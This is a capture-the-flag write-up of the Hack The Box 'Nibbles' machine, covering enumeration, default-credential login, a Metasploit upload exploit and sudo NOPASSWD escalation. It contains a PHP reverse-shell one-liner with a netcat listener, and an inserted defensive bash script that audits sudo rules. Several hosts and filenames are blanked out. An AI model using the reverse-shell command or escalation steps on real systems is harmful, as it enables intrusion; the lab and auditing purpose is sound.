Nibbles – Hackthebox

Skills Required
Basic knowledge of Linux
Enumerating ports and services

Skills Learned
Very Basic scripting
Web enumeration
Exploiting NOPASSWD


The Nmap scan revealed two open ports, 22 (SSH) and 80 (HTTP):

[root:~]# nmap -p- -f
Starting Nmap 7.70 ( ) at 2018-04-16 12:10 BST
Nmap scan report for
Host is up, received echo-reply ttl 63 (0.032s latency).
Not shown: 65311 closed ports, 222 filtered ports
Reason: 65311 resets and 222 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63

Browsing to the webpage gave me this, and viewing the source directed me to a blog-type website.

I ran dirbuster on it and found an admin area. I googled the default creds for Nibbleblog and tried them. It worked.


I looked to see if there were any exploits for Nibbleblog and saw there was a Metasploit module.

[root:~/Desktop/nibbles]# searchsploit nibble
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Nibbleblog - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
Nibbleblog - Multiple SQL Injections | exploits/php/webapps/35865.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
[root:~/Desktop/nibbles]# cat /usr/share/exploitdb/exploits/php/webapps/35865.txt

Nibbleblog is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Nibbleblog 3.0 is affected; other versions may also be vulnerable.

I cranked up Metasploit and ran the exploit with the following details and got a Meterpreter shell:

I navigated to /home and into nibbler's home directory to get the user flag.

meterpreter > cat user.txt

It's always good to see what sudo access you have. What I've found in HTB is that it generally gives away what you have to modify and run to get root. Sure enough:

meterpreter > shell
Process 22018 created.
Channel 1 created.
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
 (root) NOPASSWD: /home/nibbler/personal/stuff/

So I can run as root, which will allow me to get a reverse root shell. I unzipped the personal zip folder and added this to the bottom of

sudo php -r '$sock=fsockopen("",44444);exec("/bin/sh -i <&3 >&3 2>&3");'
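The weakness here is not NOPASSWD itself but a NOPASSWD entry whose target sits under a path the low-privileged user can write to. The script below is an added example (not part of the original writeup, and not the box's own files): it parses `sudo -l` output and flags each NOPASSWD command whose file is writable, can be created because it is missing from a writable directory, or is `ALL`. The sample output and all paths in it are constructed for the example and do not correspond to the real box.

```shell
#!/usr/bin/env bash
# Audit `sudo -l` output for NOPASSWD entries that a low-privileged user can abuse.
# Added example for this writeup; the sample below is constructed, not captured.

# Constructed sample modelled on the shape of `sudo -l` output (hypothetical paths).
SAMPLE_SUDO_L='Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /opt/scripts/example_backup.sh, /usr/bin/less /var/log/syslog
    (root) /usr/bin/id
    (ALL) NOPASSWD: ALL'

# Read `sudo -l` output on stdin; print one command path per line for every
# NOPASSWD entry. Handles "(root) NOPASSWD: /a, /b arg" (comma-separated, with
# arguments) by keeping only the first token of each comma-separated command.
nopasswd_targets() {
    sed -n 's/.*NOPASSWD:[[:space:]]*//p' | tr ',' '\n' | awk 'NF { print $1 }'
}

# Classify one sudo target from the attacker's point of view:
#   all-commands      - the entry is ALL; any command runs as root
#   writable          - the file exists and is writable by the current user
#   parent-writable   - the file is read-only but its directory is writable,
#                       so it can be renamed away and replaced
#   missing-creatable - the file does not exist but the directory is writable,
#                       so the attacker can create it
#   missing           - the file does not exist and cannot be created
#   ok                - nothing obviously wrong with this entry
classify_target() {
    t=$1
    if [ "$t" = ALL ]; then
        echo all-commands
        return 0
    fi
    dir=$(dirname "$t")
    if [ -e "$t" ]; then
        if [ -w "$t" ]; then
            echo writable
        elif [ -w "$dir" ]; then
            echo parent-writable
        else
            echo ok
        fi
    elif [ -d "$dir" ] && [ -w "$dir" ]; then
        echo missing-creatable
    else
        echo missing
    fi
}

# Read `sudo -l` output on stdin; print "<target><TAB><classification>" per target.
audit_sudo_l() {
    nopasswd_targets | while IFS= read -r target; do
        printf '%s\t%s\n' "$target" "$(classify_target "$target")"
    done
}

# Stand-alone run over the constructed sample. On a real host, pipe the live
# output instead:  sudo -n -l 2>/dev/null | audit_sudo_l
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l
```

Anything reported as `writable`, `parent-writable` or `missing-creatable` is the same class of bug as on this box: the sudoers rule grants root to a program the user controls. The fix on the defending side is to move the script to a root-owned, root-writable-only location (for example under /usr/local/sbin) before granting NOPASSWD on it.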

I started a netcat listener on port 44444. After about 20 seconds I got a connection back.

[root:...ktop/nibbles/personal/stuff]# nc -lvp 44444
listening on [any] 44444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 50308
/bin/sh: 0: can't access tty; job control turned off
# whoami
# cat /root/root.txt



This was quite an easy box for me. Not long ago I had finished Bashed and remembered to take advantage of sudo -l. I want to go back and redo this box before it retires and complete it without using Metasploit.